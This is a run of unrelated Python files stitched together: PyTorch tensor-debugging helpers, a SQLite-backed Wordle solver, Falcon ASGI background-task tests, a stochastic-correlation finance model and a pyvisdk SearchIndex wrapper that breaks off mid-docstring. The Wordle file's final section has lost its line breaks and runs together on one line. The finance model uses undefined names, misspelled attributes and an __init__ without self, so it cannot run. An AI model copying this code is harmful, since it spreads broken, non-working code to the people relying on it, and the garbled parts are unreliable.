        # Imported lazily: the visualization module is only needed by the
        # debugging methods, so the rest of this module stays importable
        # without it.
        import util.image_visualization

        if len(tensor_list_one) != len(tensor_list_two):
            return False
        index = 0
        for tensor_one, tensor_two in zip(tensor_list_one, tensor_list_two):
            if not TensorUtils.tensors_are_equal(tensor_one, tensor_two):
                print("tensor_lists_are_equal --- \n"
                      "tensor_list_one[" + str(index) + "]: \n" + str(tensor_one) + "\n" +
                      "and " + "tensor_list_two[" + str(index) + "]" + str(tensor_two) +
                      " are not equal.")
                print("showing tensor one:")
                element_without_channel_dimension = tensor_one.squeeze(0)
                util.image_visualization.imshow_tensor_2d(element_without_channel_dimension)
                print("showing tensor two:")
                element_without_channel_dimension = tensor_two.squeeze(0)
                util.image_visualization.imshow_tensor_2d(element_without_channel_dimension)
                return False
            index += 1
        return True

    # Debugging method that finds equal slices in a 4-dimensional tensor over
    # the batch dimension and visualizes them
    @staticmethod
    def find_equal_slices_over_batch_dimension(tensor):
        import util.image_visualization  # debug-only dependency, see above

        number_or_slices = tensor.size(0)
        for slice_one_index in range(0, number_or_slices):
            tensor_slice_one = tensor[slice_one_index, :, :, :]
            # Only compare pairs once: second index starts after the first.
            for slice_two_index in range(slice_one_index + 1, number_or_slices):
                tensor_slice_two = tensor[slice_two_index, :, :, :]
                if TensorUtils.tensors_are_equal(tensor_slice_one, tensor_slice_two):
                    print("find_equal_slices_over_batch_dimension --- \n"
                          "tensor[" + str(slice_one_index) + ",:,:,:]: \n" + str(tensor_slice_one) + "\n" +
                          "and " + "tensor[" + str(slice_two_index) + "]" + str(tensor_slice_two) +
                          " are equal.")
                    print("showing tensor slice one:")
                    element_without_channel_dimension = tensor_slice_one.squeeze(0)
                    util.image_visualization.imshow_tensor_2d(element_without_channel_dimension)
                    print("showing tensor slice two:")
                    element_without_channel_dimension = tensor_slice_two.squeeze(0)
                    util.image_visualization.imshow_tensor_2d(element_without_channel_dimension)

    @staticmethod
    def number_of_zeros(tensor):
        """Return the number of elements equal to zero."""
        mask = tensor.eq(0)
        return torch.masked_select(tensor, mask).view(-1).size(0)

    @staticmethod
    def number_of_non_zeros(tensor):
        """Return the number of elements not equal to zero."""
        number_of_elements = tensor.view(-1).size(0)
        return number_of_elements - TensorUtils.number_of_zeros(tensor)

    @staticmethod
    def number_of_ones(tensor):
        """Return the number of elements equal to one."""
        mask = tensor.eq(1)
        return torch.masked_select(tensor, mask).view(-1).size(0)

    @staticmethod
    def number_of_non_ones(tensor):
        """Return the number of elements not equal to one."""
        number_of_elements = tensor.view(-1).size(0)
        return number_of_elements - TensorUtils.number_of_ones(tensor)

    @staticmethod
    def sum_list_of_tensors(list_of_tensors):
        """Return the element-wise sum of a non-empty list of same-shaped tensors.

        BUG FIX: the original seeded the accumulator with
        ``result = list_of_tensors[0]`` and then applied in-place ``+=``,
        which silently mutated the caller's first tensor. The first element
        is now cloned so the input list is left intact.
        """
        result = list_of_tensors[0].clone()
        for index in range(1, len(list_of_tensors)):
            result += list_of_tensors[index]
        return result

    @staticmethod
    def apply_binary_mask(tensor, mask):
        """Apply a binary mask to a tensor.

        The dimensions of the mask must match the last dimensions of the
        tensor.
        """
        return tensor * mask

    @staticmethod
    def print_max(tensor, variable_name):
        """Print the maximum element of *tensor*, labeled with *variable_name*."""
        print("max element in " + variable_name + " :" + str(torch.max(tensor)))

    @staticmethod
    def number_of_dimensions(tensor):
        """Return the number of dimensions (rank) of *tensor*."""
        return len(tensor.size())

    @staticmethod
    def chunk_list_of_tensors_along_dimension(list_of_tensors: list, number_of_chunks: int, dim: int):
        """Chunk every tensor along *dim*; result_lists[i] collects chunk i of every tensor."""
        result_lists = list([])
        for i in range(0, number_of_chunks):
            result_lists.append(list([]))
        for tensor in list_of_tensors:
            chunk_tensors = torch.chunk(tensor, number_of_chunks, dim)
            for i in range(0, len(chunk_tensors)):
                result_lists[i].append(chunk_tensors[i])
        return result_lists

    @staticmethod
    def sum_lists_of_tensor_lists_element_wise(list_of_tensor_lists: list):
        """Given a list of equally long tensor lists, sum the tensors that share
        the same index in the inner lists.

        BUG FIX: like ``sum_list_of_tensors``, the original accumulated
        in-place into ``list_of_tensor_lists[0][element_index]``, mutating the
        caller's data; the seed tensor is now cloned.
        """
        result = list([])
        for element_index in range(0, len(list_of_tensor_lists[0])):
            activations_summed = list_of_tensor_lists[0][element_index].clone()
            for list_index in range(1, len(list_of_tensor_lists)):
                activations_summed += list_of_tensor_lists[list_index][element_index]
            result.append(activations_summed)
        return result

    # Return a copy of a list of tensors with every element in pinned memory.
    # The idea is that this may help when the list of tensors needs to be
    # moved to GPU, to speed up the data transfer.
    @staticmethod
    def get_pinned_memory_copy_of_list(list_of_tensor_lists: list):
        result = list([])
        for tensor in list_of_tensor_lists:
            # See: https://pytorch.org/docs/master/notes/cuda.html
            result.append(tensor.pin_memory())
        return result


def test_number_of_non_zeros():
    tensor = torch.zeros(3, 3)
    print("tensor: " + str(tensor))
    print("number of non-zeros: " + str(TensorUtils.number_of_non_zeros(tensor)))


def main():
    test_number_of_non_zeros()


if __name__ == "__main__":
    main()
<reponame>kota7/wordleai-sql<gh_stars>0
# -*- coding: utf-8 -*-
"""
SQLite backend.

Tables are named by the following convention:
  {vocabname}_words  : contains all words
  {vocabname}_judges : contains judge results for all word pairs
"""

import os
import sys
import sqlite3
import math
import random
from contextlib import contextmanager
from logging import getLogger
logger = getLogger(__name__)

from .utils import all_wordle_judges, _timereport, _dedup, WordEvaluation, wordle_judge, encode_judgement, _read_vocabfile
from .base import WordleAI


def _setup(dbfile: str, vocabname: str, words: list or dict, use_cpp: bool=True, recompile: bool=False, compiler: str=None):
    """Create and populate the "{vocabname}_words" and "{vocabname}_judges"
    tables in `dbfile`, dropping any existing versions first.

    `words` is either a list of words (all weighted 1) or a dict mapping
    word -> weight. All words must be unique and of equal length.
    """
    assert len(words) == len(set(words)), "input_words must be unique"
    wordlens = set(len(w) for w in words)
    assert len(wordlens) == 1, "word length must be equal, but '{}'".format(wordlens)

    with sqlite3.connect(dbfile) as conn:
        c = conn.cursor()
        c.execute("PRAGMA journal_mode=OFF")  # disable rollback to save time
        c.execute('DROP TABLE IF EXISTS "{name}_words"'.format(name=vocabname))
        c.execute('CREATE TABLE "{name}_words" (word TEXT PRIMARY KEY, weight FLOAT)'.format(name=vocabname))
        if isinstance(words, dict):
            params = words.items()
        elif isinstance(words, list):
            params = [(w, 1) for w in words]  # default weight 1 for every word
        else:
            raise TypeError("Unsupported type of `words`, '{}'".format(type(words)))
        c.executemany('INSERT INTO "{name}_words" VALUES (?,?)'.format(name=vocabname), params)
        c.execute('CREATE INDEX "{name}_words_idx" ON "{name}_words" (word)'.format(name=vocabname))

        with _timereport("Precomputing wordle judges"):
            c.execute('DROP TABLE IF EXISTS "{name}_judges"'.format(name=vocabname))
            c.execute('CREATE TABLE "{name}_judges" (input_word TEXT, answer_word TEXT, judge INT)'.format(name=vocabname))
            # all_wordle_judges yields (input_word, answer_word, judge) tuples
            # for every word pair, optionally via the compiled C++ helper.
            params = all_wordle_judges(words, use_cpp=use_cpp, recompile=recompile, compiler=compiler)
            c.executemany('INSERT INTO "{name}_judges" VALUES (?,?,?)'.format(name=vocabname), params)
        with _timereport("Creating indices"):
            c.execute('CREATE INDEX "{name}_judge_idx" ON "{name}_judges" (input_word, judge)'.format(name=vocabname))
            c.execute('CREATE INDEX "{name}_judge_idx2" ON "{name}_judges" (answer_word)'.format(name=vocabname))
        conn.commit()

# def _ensure_word_weight_column(dbfile: str, vocabname: str):
#     """If weight column is missing in the words table, add it with a constant 1"""
#     with sqlite3.connect(dbfile) as conn:
#         c = conn.cursor()
#         # check the existing column
#         c.execute('SELECT * FROM "{name}_words" LIMIT 1'.format(name=vocabname))
#         exist = any(col[0].lower() == "weight" for col in c.description)
#         if not exist:
#             c.execute('ALTER TABLE "{name}_words" ADD weight FLOAT'.format(name=vocabname))
#             logger.info('Added column `"%s_words".weight`', vocabname)
#             c.execute('UPDATE "{name}_words_approx" SET weight = 1.0'.format(name=vocabname))
#             logger.info('Filled `"%s_words_approx".weight` with ones', vocabname)
#         conn.commit()


def _evaluate(dbfile: str, vocabname: str, top_k: int=20, criterion: str="mean_entropy", candidates: list=None)-> list:
    """Score every input word against the (possibly filtered) answer set and
    return the `top_k` best WordEvaluation rows ordered by `criterion`
    (ties broken in favor of words that are themselves candidates).
    """
    with sqlite3.connect(dbfile) as conn:
        conn.create_function("log2", 1, math.log2)  # SQLite has no log2 built-in
        c = conn.cursor()
        # find the number of all words and compare with the number of candidates
        # if they are the same, then we do not need to filter answer_word
        c.execute('SELECT count(*) FROM "{name}_words"'.format(name=vocabname))
        n_words = c.fetchone()[0]
        if candidates is None or len(candidates) >= n_words:
            # all words are in the candidates
            params = None
            answer_filter = ""
        else:
            candidate_set = set(candidates)
            params = tuple(candidate_set)
            # one "?" placeholder per candidate
            answer_filter = "WHERE answer_word IN (%s)" % ",".join("?" * len(params))

        # For each input word: group the remaining answers by judge pattern and
        # aggregate group sizes (max, expected size, expected entropy).
        q = """
        with tmp AS (
          SELECT
            input_word,
            judge,
            count(*) AS n,
            log2(count(*)) AS entropy
          FROM "{name}_judges"
          {answerfilter}
          GROUP BY input_word, judge
        )
        SELECT
          input_word,
          max(n) AS max_n,
          1.0 * sum(n*n) / sum(n) AS mean_n,
          sum(n*entropy) / sum(n) AS mean_entropy
        FROM tmp
        GROUP BY input_word
        """.format(answerfilter=answer_filter, name=vocabname)
        #print(q)
        if params is None:
            c.execute(q)
        else:
            c.execute(q, params)

        candidate_set = None if candidates is None else set(candidates)
        # Append the is_candidate flag (1/0) to each aggregated row.
        out = [row + (1 if candidate_set is None else int(row[0] in candidate_set),) for row in c]
    out = [WordEvaluation(*row) for row in out]
    out.sort(key=lambda row: (getattr(row, criterion), -row.is_candidate))
    return out[:top_k]


def _vocabnames(dbfile: str)-> list:
    """Return the vocab names that have both a _words and a _judges table."""
    with sqlite3.connect(dbfile) as conn:
        c = conn.cursor()
        c.execute("SELECT name FROM sqlite_master")
        tables = [row[0] for row in c]
    t1 = [t[:-6] for t in tables if t.endswith("_words")]
    t2 = [t[:-7] for t in tables if t.endswith("_judges")]
    out = list(set(t1) & set(t2))  # we need both _words and _judges tables
    return out


def _words(dbfile: str, vocabname: str)-> list:
    """Return all words stored for `vocabname` (first column of the _words table)."""
    with sqlite3.connect(dbfile) as conn:
        c = conn.cursor()
        c.execute('SELECT * FROM "{name}_words"'.format(name=vocabname))
        words = [row[0] for row in c]
    return words


def _choose_word_with_weight(dbfile: str, vocabname: str)-> str:
    """Pick one word at random with probability proportional to its weight
    (words with weight <= 0 are excluded)."""
    with sqlite3.connect(dbfile) as conn:
        sqlite3.enable_callback_tracebacks(True)
        conn.create_function("log", 1, math.log)
        c = conn.cursor()
        # The query below uses the fact that
        #   Prob{ u_i^(1/w_i) > u_j^(1/w_j) } = w_i / (w_i + w_j),
        # where u_i, u_j ~ uniform(0, 1).
        #
        # References:
        #   https://utopia.duth.gr/~pefraimi/research/data/2007EncOfAlg.pdf
        #   https://stackoverflow.com/questions/1398113/how-to-select-one-row-randomly-taking-into-account-a-weight
        #
        # On SQLite, random() generate an integer from [-9223372036854775808, +9223372036854775808]
        # Remove sign and take mod n to make them roughly uniform on [0, n-1]
        # Then plus 0.5 to avoid zero, i.e. uniform on [0.5, ..., n-0.5]
        # Dividing by n, uniform on [0.5/n, ... 1-0.5/n]
        # With n large enough, the retult is roughly uniform on (0, 1)
        q = """
        SELECT
          word,
          -log((abs(random()) % 1000000 + 0.5) / 1000000.0) / weight AS priority
        FROM "{name}_words"
        WHERE weight > 0
        ORDER BY priority
        LIMIT 1
        """.format(name=vocabname)
        c.execute(q)
        ans = c.fetchall()
    return ans[0][0]


def _weight_defined(dbfile: str, vocabname: str)-> bool:
    """Return True when the _words table of `vocabname` has a weight column."""
    with sqlite3.connect(dbfile) as conn:
        c = conn.cursor()
        # check the existing column
        c.execute('SELECT * FROM "{name}_words" LIMIT 1'.format(name=vocabname))
        for col in c.description:
            if col[0].lower() == "weight":
                return True
    return False


class WordleAISQLite(WordleAI):
    """
    Wordle AI with SQLite backend

    Vocab information is stored in {vocabname}_words and {vocabname}_judges

    Args:
        vocabname (str):
            Name of vocaburary
        words (str or list or dict):
            If str, the path to a vocabulary file
            If list, the list of words
            If dict, mapping from word to the weight
            Can be omitted if the vocabname is already in the database and resetup=False
        dbfile (str):
            SQLite database file
            If not supplied, use environment variable `WORDLEAISQL_DBFILE` if exists,
            otherwise './wordleai.db' in the current directory is used
        decision_metric (str):
            The criteria to pick a word
            Either 'max_n', 'mean_n', of 'mean_entropy'
        candidate_weight (float):
            The weight added to the answer candidate word when picking a word
        strength (float):
            AI strength in [0, 10]
        use_cpp (bool):
            Use C++ code to precompute wodle judgements when available
        cpp_recompile (bool):
            Compile the C++ code again if the source code has no change
        cpp_compiler (str):
            Command name of the C++ compiler. If None, 'g++' and 'clang++' are searched
        resetup (bool):
            Setup again if the vocabname already exists
    """
    def __init__(self, vocabname: str, words: str or list or dict=None, dbfile: str=None,
                 decision_metric: str="mean_entropy", candidate_weight: float=0.3, strength: float=6,
                 use_cpp: bool=True, cpp_recompile: bool=False, cpp_compiler: str=None,
                 resetup: bool=False, **kwargs):
        if dbfile is None:
            # fall back to the env var, then to a file in the current directory
            dbfile = os.environ.get("WORDLEAISQL_DBFILE")
            if dbfile is None:
                dbfile = "./wordleai.db"
        os.makedirs(os.path.dirname(os.path.abspath(dbfile)), exist_ok=True)
        self.dbfile = dbfile
        logger.info("SQLite database: '%s'", self.dbfile)

        self.vocabname = vocabname
        self.decision_metric = decision_metric
        self.candidate_weight = candidate_weight
        self.strength = min(max(strength, 0), 10)  # clip to [0, 10]
        # strength is linearly converted to the power of noise: 0 -> +5, 10 -> -5
        # larger noise, close to random decision
        self.decision_noise = math.pow(10, 5-self.strength)

        if resetup or (vocabname not in self.vocabnames):
            assert words is not None, "`words` must be supplied to setup the vocab '{}'".format(vocabname)
            # Normalize `words` to a dict of word -> weight.
            # NOTE(review): this local `_words` shadows the module-level
            # _words() helper within __init__; consider renaming.
            _words = (
                words if isinstance(words, dict) else
                {w:1.0 for w in words} if isinstance(words, list) else
                _read_vocabfile(words) if isinstance(words, str) else
                None
            )
            if _words is None:
                raise TypeError("Unsupported type 'words': '{}'".format(type(words)))
            with _timereport("Setup tables for vocabname '%s'" % vocabname):
                _setup(dbfile=dbfile, vocabname=vocabname, words=_words,
                       use_cpp=use_cpp, recompile=cpp_recompile, compiler=cpp_compiler)
        # else:
        #     _ensure_word_weight_column(dbfile, vocabname)  # make sure previously created words table has the weight column

        self._info = []  # infomation of the judge results
        self._nonanswer_words = set([])  # words that cannot become an answer
        #self.set_candidates()

    @property
    def name(self)-> str:
        return "Wordle AI (SQLite backend)"

    @property
    def vocabnames(self)-> list:
        """Available vocab
names""" return _vocabnames(self.dbfile) @property def words(self)-> list: """All words that can be inputted""" return _words(self.dbfile, self.vocabname) def evaluate(self, top_k: int=20, criterion: str="mean_entropy")-> list: """ Evaluate input words and return the top ones in accordance with the given criterion """ return _evaluate(self.dbfile, self.vocabname, top_k=top_k, criterion=criterion, candidates=self.candidates) def pick_word(self): num_remain = len(self.candidates) #print(count, candidates) if num_remain == 1: return self.candidates[0] elif num_remain == 0: print("Warning: No candidates left. This is a random choice") return random.choice(self.words) results = self.evaluate(top_k=10000, criterion=self.decision_metric) #print(results[:10], len(results)) words = [row.input_word for row in results] scores = [getattr(row, self.decision_metric) for row in results] # score of eadch word, the smaller the better if self.decision_metric in ("mean_n", "max_n"): # we take log of the score to adjust for the scale # add 1p just in case to avoid the zero error scores = [math.log1p(s) for s in scores] # Flip the sign and adjust for the candidates for i, row in enumerate(results): scores[i] = row.is_candidate * self.candidate_weight - scores[i] # Subtract the maximum to avoid overflow maxscore = max(scores) scores = [s - maxscore for s in scores] # Add randomness weights = [math.exp(s / self.decision_noise) for s in scores] out = random.choices(words, weights=weights, k=1) return out[0] def choose_answer_word(self, weighted: bool=True)-> str: """Randomly choose an answer word in accordance with the given weight""" if not weighted: return random.choice(self.words) if not _weight_defined(self.dbfile, self.vocabname): print("Word weight is not defined. Please call `WordleAISQLite` with `resetup=True` next time", file=sys.stderr) return random.choice(self.words) return _choose_word_with_weight(self.dbfile, self.vocabname)
import asyncio
from collections import Counter
import time

import pytest

from falcon import runs_sync
from falcon import testing
from falcon.asgi import App


def test_multiple():
    """Verify scheduling of multiple sync/async background jobs per request.

    Exercises Response.schedule() (async-only; rejects plain callables with
    TypeError), Response.schedule_sync() (plain callables), and the error
    path when a coroutine *object* rather than a coroutine function is
    scheduled.
    """

    class SomeResource:
        def __init__(self):
            # Tallies how many times each background job ran, keyed by kind.
            self.counter = Counter()

        async def on_get(self, req, resp):
            async def background_job_async():
                self.counter['backround:on_get:async'] += 1

            def background_job_sync():
                self.counter['backround:on_get:sync'] += 20

            # schedule() only accepts awaitables/coroutine functions; a plain
            # sync callable must be rejected.
            with pytest.raises(TypeError):
                resp.schedule(background_job_sync)

            # Two async jobs (+1 each) and two sync jobs (+20 each).
            resp.schedule_sync(background_job_sync)
            resp.schedule(background_job_async)
            resp.schedule_sync(background_job_sync)
            resp.schedule(background_job_async)

        async def on_post(self, req, resp):
            async def background_job_async():
                self.counter['backround:on_get:async'] += 1000

            def background_job_sync():
                self.counter['backround:on_get:sync'] += 2000

            # Two async jobs (+1000 each) and two sync jobs (+2000 each).
            resp.schedule(background_job_async)
            resp.schedule(background_job_async)
            resp.schedule_sync(background_job_sync)
            resp.schedule_sync(background_job_sync)

        async def on_put(self, req, resp):
            async def background_job_async():
                self.counter['backround:on_get:async'] += 1000

            # Deliberately pass a coroutine *object* to schedule(); await it
            # in finally so the event loop never warns about an un-awaited
            # coroutine.
            c = background_job_async()

            try:
                resp.schedule(c)
            finally:
                await c

    resource = SomeResource()

    app = App()
    app.add_route('/', resource)

    client = testing.TestClient(app)
    client.simulate_get()
    client.simulate_post()

    # Give the scheduled background tasks time to complete.
    # NOTE(review): fixed sleep makes this timing-sensitive on slow CI.
    time.sleep(0.5)

    # GET contributes 2 async / 40 sync; POST contributes 2000 / 4000.
    assert resource.counter['backround:on_get:async'] == 2002
    assert resource.counter['backround:on_get:sync'] == 4040

    # With the default error handlers installed, the TypeError surfaces as
    # a generic 500 response.
    result = client.simulate_put()
    assert result.status_code == 500

    # NOTE(kgriffs): Remove default handlers so that we can check the raised
    #   exception is what we expected.
    app._error_handlers.clear()

    with pytest.raises(TypeError) as exinfo:
        client.simulate_put()

    assert 'coroutine' in str(exinfo.value)


class SimpleCallback:
    """Resource that schedules a single async callback on every responder."""

    def __init__(self):
        self.called = 0
        # Set by _call_me so tests can await completion deterministically.
        self.event = asyncio.Event()

    async def _call_me(self):
        self.called += 1
        self.event.set()

    async def on_get(self, req, resp):
        resp.content_type = 'text/plain'
        resp.data = b'Hello, World!\n'
        resp.schedule(self._call_me)

    # HEAD shares the GET responder (body is stripped by the framework).
    on_head = on_get

    async def on_get_sse(self, req, resp):
        async def nop_emitter():
            # Yielding None triggers falcon's keep-alive ": ping" event.
            yield None

        resp.sse = nop_emitter()
        resp.schedule(self._call_me)

    async def on_get_stream(self, req, resp):
        async def stream():
            yield b'One\n'
            yield b'Two\n'
            yield b'Three\n'

        resp.content_type = 'text/plain'
        resp.stream = stream()
        resp.schedule(self._call_me)


@pytest.fixture()
def simple_resource():
    return SimpleCallback()


@pytest.fixture()
def callback_app(simple_resource):
    # One resource instance handles plain, SSE, and streamed responses via
    # route suffixes.
    app = App()
    app.add_route('/', simple_resource)
    app.add_route('/sse', simple_resource, suffix='sse')
    app.add_route('/stream', simple_resource, suffix='stream')
    return app


@pytest.mark.parametrize('method,uri,expected', [
    ('GET', '/', 'Hello, World!\n'),
    ('HEAD', '/', ''),
    ('GET', '/sse', ': ping\n\n'),
    ('GET', '/stream', 'One\nTwo\nThree\n'),
])
@runs_sync
async def test_callback(callback_app, simple_resource, method, uri, expected):
    """The scheduled callback runs exactly once for every response type."""
    async with testing.ASGIConductor(callback_app) as conductor:
        resp = await conductor.simulate_request(method, uri)
        assert resp.status_code == 200
        assert resp.text == expected

    # The callback runs in the background; wait (bounded) for its signal.
    await asyncio.wait_for(simple_resource.event.wait(), 3.0)
    assert simple_resource.called == 1
<filename>entities.py import numpy as np import finmath_calculations # MATHEMATICAL FUNCTIONS ############################################################################################### class coef_function1d(object): ''' 1-dimensional coeffitient function. It depends on only 1 argument. Contains its value, first and second derivatives in point x. ''' def __init__(self, value, FirstDerivative, SecondDerivative): self.value = value self.dx = FirstDerivative self.dxdx = SecondDerivative def ReturnValue(self, x): return self.value(x) def dx(self, x): return self.FirstDerivative(x) def dxdx(self, x): return self.SecondDerivative(x) class coef_function2d(object): ''' 2-dimensional coefficient function. Usually takes time-moment and process value as arguments. Both are real numbers. ''' def __init__(self, value, Dt, Dx, DxDx): self.value = value self.Dt = Dt self.Dx = Dx self.DxDx = Dxdx def value(self, t, x): return value(t, x) def dt(self, t, x): return self.Dt(t, x) def dx(self, t, x): return self.Dx(t, x) def dxdx(self, t, x): return self.DxDx(t, x) class coef_function3d(object): ''' 3-dimensional coefficient function. Logic remains the same. ''' def __init__(self, value, Dt, Dx, Dy, DxDy, DxDx, DyDy): self.value = value self.Dt = Dt self.Dx = Dx self.Dy = Dy self.DxDy = Dxdy self.DxDx = Dxdx self.DyDy = Dydy def value(self, t, x, y): return self.value(t, x, y) def dt(self, t, x, y): return self.Dt(t, x, y) def dx(self, t, x, y): return self.Dx(t, x, y) def dy(self, t, x, y): return self.Dy(t, x, y) def dxdy(self, t, x, y): return self.DxDy(t, x, y) def dxdx(self, t, x, y): return self.DxDx(t, x, y) def dydy(self, t, x, y): return self.DyDy(t, x, y) class mean_reversion(object): ''' Class for correlation mean-reverted drift function. It depends on N+1 arguments: nu1, ... , nuN, rho. 
''' def __init__(self, value, gradient, hessian): self.value = value self.gradient = gradient self.hessian = hessian def dx(self, NuVector, rho, coordinate): return self.gradient[coordinate](NuVector, rho) def dxdx(self, NuVector, rho, i, j): return self.gessian[i][j](NuVector, rho) ######################################################################################################################## # SDE PROCESSES ######################################################################################################## class ParticleProcess(object): ''' This process describes the behaviour of the asset price. The process can be described by an SDE: dS = drift_coef(t, S)dt + diffusion_coef(t, S, Nu)dWt, where Nu is the volatility process. NOT IMPLEMENTED YET PARAMS: S0: the initial value of our diffusion. A number or a vector of numbers. drift_coef: 2d function, depends on time and process value. diffusion_coef: 3d function, depends on time, process value and volatility value. ''' def __init__(self, S0, drift_coef, diffusion_coef): self.S0 = S0 self.drift_coef = drift_coef self.diffusion_coef = diffusion_coef class VolatilityProcess(object): ''' This process describes the behaviour of the asset price. The process can be described by an SDE: dNu = drift_coef(t, Nu)dt + diffusion_coef(t, Nu)dBt, where Nu is the volatility process. NOT IMPLEMENTED YET PARAMS: Nu0: the initial value of our diffusion. A number or a vector of numbers. drift_coef: 2d function, depends on time and volatility value. diffusion_coef: 2d function, depends on time, and volatility value. ''' def __init__(self, Nu0, drift_coef, diffusion_coef): self.Nu0 = Nu0 self.drift_coef = drift_coef self.diffusion_coef = diffusion_coef class CorrelationProcess(object): ''' This process describes the behaviour of the asset price. The process can be described by an SDE: dNu = drift_coef(t, Nu)dt + diffusion_coef(t, Nu)dBt, where Nu is the volatility process. 
NOT IMPLEMENTED YET PARAMS: rho0: the initial value of our process. A number or a vector of numbers. mean_reversion: Psy(Nu1, ... , NuN) - rho_t. diffusion_coef: 1d function, depends only on correlation value. ''' def __init__(self, rho0, alpha, mean_reversion, diffustion_coef): self.rho0 = rho0 self.alpha = alpha self.drift_coef = self.alpha * mean_reversion self.diffusion_coef = diffusion_coef ######################################################################################################################## # STOCHASTIC CORRELATION MODEL ######################################################################################### class StochasticCorrModel(object): def __init__(Particles, Vols, Corr_Process, VolCorrMatrix, ParticleVolCorrMatrix, rho_skew): ''' Attributes: Particles -- the N-dimensional vector-process that describes asset prices. Vols -- the N-dimensional vector-process that descrives volatilities. Corr_Process -- the 1-d process that describes the correlation between brownian motions. GeneralCorrMatrix -- matrix of size 2N+1 x 2N+1 that contains all the correlations. ''' self.particles = Particles self.vols = vols self.corr_process = Corr_Process self.N = len(Particles) self.VolCorrMatrix = VolCorrMatrix self.ParticleVolCorrMatrix = ParticleVolCorrMatrix def GeneralCorrMatrix(self, cur_rho): ''' This method returns the current value of the General stochastic correlation matrix. RETURNS: np.array of size 2N+1x2N+1. ''' return CalculateGeneralCorrMatrix(cur_rho, self.rho_skew, self.ParticleVolCorrMatrix, self.VolCorrMatrix, self.N) ########################################################################################################################
from pyvisdk.base.managed_object_types import ManagedObjectTypes
from pyvisdk.base.base_entity import BaseEntity
import logging

########################################
# Automatically generated, do not edit.
########################################

log = logging.getLogger(__name__)


class SearchIndex(BaseEntity):
    '''The SearchIndex service allows a client to efficiently query the inventory
    for a specific managed entity by attributes such as UUID, IP address, DNS
    name, or datastore path. Such searches typically return a VirtualMachine or
    a HostSystem. While searching, only objects for which the user has
    sufficient privileges are considered. The findByInventoryPath and findChild
    operations only search on entities for which the user has view privileges;
    all other SearchIndex find operations only search virtual machines and
    hosts for which the user has read privileges. If the user does not have
    sufficient privileges for an object that matches the search criteria, that
    object is not returned.

    NOTE: every method below is a thin wrapper that forwards its arguments to
    the server-side operation of the same name via ``self.delegate`` (inherited
    from BaseEntity). The delegate is called with arguments in wire order,
    which places the optional ``datacenter`` first.
    '''

    def __init__(self, core, name=None, ref=None, type=ManagedObjectTypes.SearchIndex):
        super(SearchIndex, self).__init__(core, name=name, ref=ref, type=type)

    def FindAllByDnsName(self, dnsName, vmSearch, datacenter=None):
        '''Finds all virtual machines or hosts by DNS name. The DNS name for a virtual
        machine is the one returned from VMware tools, hostName.

        :param datacenter: If specified, restricts the query to entities in a particular
            datacenter. If not specified, the entire inventory is searched.

        :param dnsName: The fully qualified domain name to find.

        :param vmSearch: If true, search for virtual machines, otherwise search for hosts.

        '''
        return self.delegate("FindAllByDnsName")(datacenter, dnsName, vmSearch)

    def FindAllByIp(self, ip, vmSearch, datacenter=None):
        '''Finds all virtual machines or hosts by IP address, where the IP address is in
        dot-decimal notation. For example, 10.17.12.12. The IP address for a virtual
        machine is the one returned from VMware tools, ipAddress.

        :param datacenter: If specified, restricts the query to entities in a particular
            datacenter. If not specified, the entire inventory is searched.

        :param ip: The dot-decimal notation formatted IP address to find.

        :param vmSearch: If true, search for virtual machines, otherwise search for hosts.

        '''
        return self.delegate("FindAllByIp")(datacenter, ip, vmSearch)

    def FindAllByUuid(self, uuid, vmSearch, datacenter=None, instanceUuid=None):
        '''Finds all virtual machines or hosts by UUID.

        :param datacenter: If specified, restricts the query to entities in a particular
            datacenter. If not specified, the entire inventory is searched.

        :param uuid: The UUID to find. If vmSearch is true, the UUID can be either BIOS or
            instance UUID.

        :param vmSearch: If true, search for virtual machines, otherwise search for hosts.

        :param instanceUuid: Should only be set when vmSearch is true. If specified, search
            for virtual machines whose instance UUID matches the given uuid.
            Otherwise, search for virtual machines whose BIOS UUID matches the
            given uuid.

        '''
        return self.delegate("FindAllByUuid")(datacenter, uuid, vmSearch, instanceUuid)

    def FindByDatastorePath(self, datacenter, path):
        '''Finds a virtual machine by its location on a datastore.

        :param datacenter: Specifies the datacenter to which the datastore path belongs.

        :param path: A datastore path to the .vmx file for the virtual machine.

        '''
        return self.delegate("FindByDatastorePath")(datacenter, path)

    def FindByDnsName(self, dnsName, vmSearch, datacenter=None):
        '''Finds a virtual machine or host by DNS name. The DNS name for a virtual
        machine is the one returned from VMware tools, hostName.

        :param datacenter: If specified, restricts the query to entities in a particular
            datacenter. If not specified, the entire inventory is searched.

        :param dnsName: The fully qualified domain name to find.

        :param vmSearch: if true, search for virtual machines, otherwise search for hosts.

        '''
        return self.delegate("FindByDnsName")(datacenter, dnsName, vmSearch)

    def FindByInventoryPath(self, inventoryPath):
        '''Finds a managed entity based on its location in the inventory. The path is
        separated by slashes ('/'). For example, a path should be of the form "My
        Folder/My Datacenter/vm/Discovered VM/VM1". A leading slash or trailing
        slash is ignored. Thus, the following paths all represents the same object:
        "a/b", "/a/b", "a/b/", and '/a/b/'. Slashes in names must be represented
        using %2f, following the standard URL syntax. Any object in the inventory
        can be retrieved using this method, including resource pools and hosts.

        :param inventoryPath: The path to the entity.

        '''
        return self.delegate("FindByInventoryPath")(inventoryPath)

    def FindByIp(self, ip, vmSearch, datacenter=None):
        '''Finds a virtual machine or host by IP address, where the IP address is in dot-
        decimal notation. For example, 10.17.12.12. The IP address for a virtual
        machine is the one returned from VMware tools, ipAddress.

        :param datacenter: If specified, restricts the query to entities in a particular
            datacenter. If not specified, the entire inventory is searched.

        :param ip: The dot-decimal notation formatted IP address to find.

        :param vmSearch: if true, search for virtual machines, otherwise search for hosts.

        '''
        return self.delegate("FindByIp")(datacenter, ip, vmSearch)

    def FindByUuid(self, uuid, vmSearch, datacenter=None, instanceUuid=None):
        '''Finds a virtual machine or host by BIOS or instance UUID.

        :param datacenter: If specified, restricts the query to entities in a particular
            datacenter. If not specified, the entire inventory is searched.

        :param uuid: The UUID to find. If vmSearch is true, the uuid can be either BIOS or
            instance UUID.

        :param vmSearch: If true, search for virtual machines, otherwise search for hosts.

        :param instanceUuid: Should only be set when vmSearch is true. If specified, search
            for virtual machines whose instance UUID matches the given uuid.
            Otherwise, search for virtual machines whose BIOS UUID matches the
            given uuid.vSphere API 4.0

        '''
        return self.delegate("FindByUuid")(datacenter, uuid, vmSearch, instanceUuid)

    def FindChild(self, entity, name):
        '''Finds a particular child based on a managed entity name. This only searches
        the immediate children of a managed entity. For a Datacenter, the host and
        vm folders are considered children. For a ComputeResource, the hosts and
        root ResourcePool are considered children.

